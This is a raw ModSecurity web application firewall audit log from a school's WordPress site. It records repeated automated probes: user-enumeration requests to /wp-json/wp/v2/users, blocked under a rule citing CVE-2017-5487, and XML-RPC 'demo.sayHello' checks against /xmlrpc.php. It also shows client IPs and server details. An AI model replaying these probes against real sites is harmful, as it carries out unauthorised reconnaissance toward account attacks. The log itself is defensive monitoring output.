[severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443442937854 6145 (- - -) Stopwatch2: 1747443442937854 6145; combined=4355, p1=601, p2=3523, p3=32, p4=34, p5=97, sr=92, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c0ef20-Z-- --6aa7df2e-A-- [17/May/2025:07:57:29 +0700] aCfe-XyxdQCiyU1ENFcnXQAAAA4 103.236.140.4 43194 103.236.140.4 8181 --6aa7df2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6aa7df2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aa7df2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443449641003 2646 (- - -) Stopwatch2: 1747443449641003 2646; combined=1196, p1=434, p2=723, p3=0, p4=0, p5=38, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aa7df2e-Z-- --9d7d453d-A-- [17/May/2025:07:57:29 +0700] aCfe-QTOsBn9MSWb6WJt-wAAAJA 103.236.140.4 43196 103.236.140.4 8181 --9d7d453d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9d7d453d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7d453d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443449643812 2024 (- - -) Stopwatch2: 1747443449643812 2024; combined=1004, p1=328, p2=650, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7d453d-Z-- --8eaaf763-A-- [17/May/2025:07:57:30 +0700] aCfe-nyxdQCiyU1ENFcnXgAAAA8 103.236.140.4 43198 103.236.140.4 8181 --8eaaf763-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8eaaf763-C-- demo.sayHello --8eaaf763-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8eaaf763-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443450571049 4762 (- - -) Stopwatch2: 1747443450571049 4762; combined=3788, p1=429, p2=3148, p3=30, p4=32, p5=87, sr=86, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8eaaf763-Z-- --6fe35525-A-- [17/May/2025:07:57:36 +0700] aCffAHyxdQCiyU1ENFcnYQAAABY 103.236.140.4 43206 103.236.140.4 8181 --6fe35525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fe35525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fe35525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443456363509 3200 (- - -) Stopwatch2: 1747443456363509 3200; combined=1372, p1=469, p2=871, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fe35525-Z-- --31165f71-A-- [17/May/2025:07:57:36 +0700] aCffAHyxdQCiyU1ENFcnYgAAABg 103.236.140.4 43208 103.236.140.4 8181 --31165f71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31165f71-C-- demo.sayHello --31165f71-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31165f71-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443456373092 5158 (- - -) Stopwatch2: 1747443456373092 5158; combined=4225, p1=438, p2=3556, p3=38, p4=43, p5=88, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31165f71-Z-- --2f96af4d-A-- [17/May/2025:07:57:36 +0700] aCffAHyxdQCiyU1ENFcnYwAAAAA 103.236.140.4 43210 103.236.140.4 8181 --2f96af4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f96af4d-C-- demo.sayHello --2f96af4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f96af4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443456383089 5169 (- - -) Stopwatch2: 1747443456383089 5169; combined=3898, p1=507, p2=3177, p3=30, p4=32, p5=90, sr=85, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f96af4d-Z-- --54aeb071-A-- [17/May/2025:07:57:37 +0700] aCffAXyxdQCiyU1ENFcnZAAAAAE 103.236.140.4 43212 103.236.140.4 8181 --54aeb071-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --54aeb071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54aeb071-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443457039829 1770 (- - -) Stopwatch2: 1747443457039829 1770; combined=836, p1=286, p2=525, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54aeb071-Z-- --8a243a62-A-- [17/May/2025:07:57:42 +0700] aCffBhKi5m5upc8uMd6h3gAAAMQ 103.236.140.4 43222 103.236.140.4 8181 --8a243a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8a243a62-C-- demo.sayHello --8a243a62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a243a62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443462579058 6598 (- - -) Stopwatch2: 1747443462579058 6598; combined=4815, p1=616, p2=3959, p3=38, p4=42, p5=96, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a243a62-Z-- --b4b54719-A-- [17/May/2025:07:57:43 +0700] aCffB3yxdQCiyU1ENFcnaAAAAAc 103.236.140.4 43224 103.236.140.4 8181 --b4b54719-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b4b54719-C-- demo.sayHello --b4b54719-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4b54719-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443463789819 4785 (- - -) Stopwatch2: 1747443463789819 4785; combined=3702, p1=490, p2=3013, p3=24, p4=26, p5=89, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4b54719-Z-- --10fa6405-A-- [17/May/2025:07:58:57 +0700] aCffUXyxdQCiyU1ENFcncAAAABQ 103.236.140.4 43252 103.236.140.4 8181 --10fa6405-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10fa6405-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10fa6405-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443537762482 2884 (- - -) Stopwatch2: 1747443537762482 2884; combined=1246, p1=431, p2=785, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10fa6405-Z-- --c9ff8649-A-- [17/May/2025:07:59:03 +0700] aCffV3yxdQCiyU1ENFcncgAAABg 103.236.140.4 43256 103.236.140.4 8181 --c9ff8649-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9ff8649-C-- demo.sayHello --c9ff8649-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9ff8649-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443543084960 5965 (- - -) Stopwatch2: 1747443543084960 5965; combined=4228, p1=637, p2=3395, p3=34, p4=38, p5=75, sr=85, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9ff8649-Z-- --1997ec71-A-- [17/May/2025:07:59:51 +0700] aCffhxKi5m5upc8uMd6h4QAAAMg 103.236.140.4 43260 103.236.140.4 8181 --1997ec71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1997ec71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1997ec71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443591447260 2873 (- - -) Stopwatch2: 1747443591447260 2873; combined=1159, p1=397, p2=736, p3=0, p4=0, p5=26, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1997ec71-Z-- --0c9cfe72-A-- [17/May/2025:07:59:57 +0700] aCffjXyxdQCiyU1ENFcndAAAABc 103.236.140.4 43264 103.236.140.4 8181 --0c9cfe72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0c9cfe72-C-- demo.sayHello --0c9cfe72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c9cfe72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443597828360 6635 (- - -) Stopwatch2: 1747443597828360 6635; combined=4799, p1=620, p2=3936, p3=39, p4=44, p5=96, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c9cfe72-Z-- --71db4e68-A-- [17/May/2025:08:00:28 +0700] aCffrBKi5m5upc8uMd6h4wAAAMo 103.236.140.4 43304 103.236.140.4 8181 --71db4e68-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71db4e68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71db4e68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443628230601 2591 (- - -) Stopwatch2: 1747443628230601 2591; combined=1317, p1=405, p2=877, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71db4e68-Z-- --cb749c49-A-- [17/May/2025:08:00:34 +0700] aCffsnyxdQCiyU1ENFcndwAAAAY 103.236.140.4 43314 103.236.140.4 8181 --cb749c49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cb749c49-C-- demo.sayHello --cb749c49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb749c49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443634852241 5193 (- - -) Stopwatch2: 1747443634852241 5193; combined=4037, p1=468, p2=3347, p3=34, p4=35, p5=91, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb749c49-Z-- --555b9408-A-- [17/May/2025:08:01:59 +0700] aCfgBwTOsBn9MSWb6WJuLwAAAJE 103.236.140.4 43418 103.236.140.4 8181 --555b9408-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.113 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.113 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --555b9408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --555b9408-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443719310298 2990 (- - -) Stopwatch2: 1747443719310298 2990; combined=1419, p1=455, p2=934, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
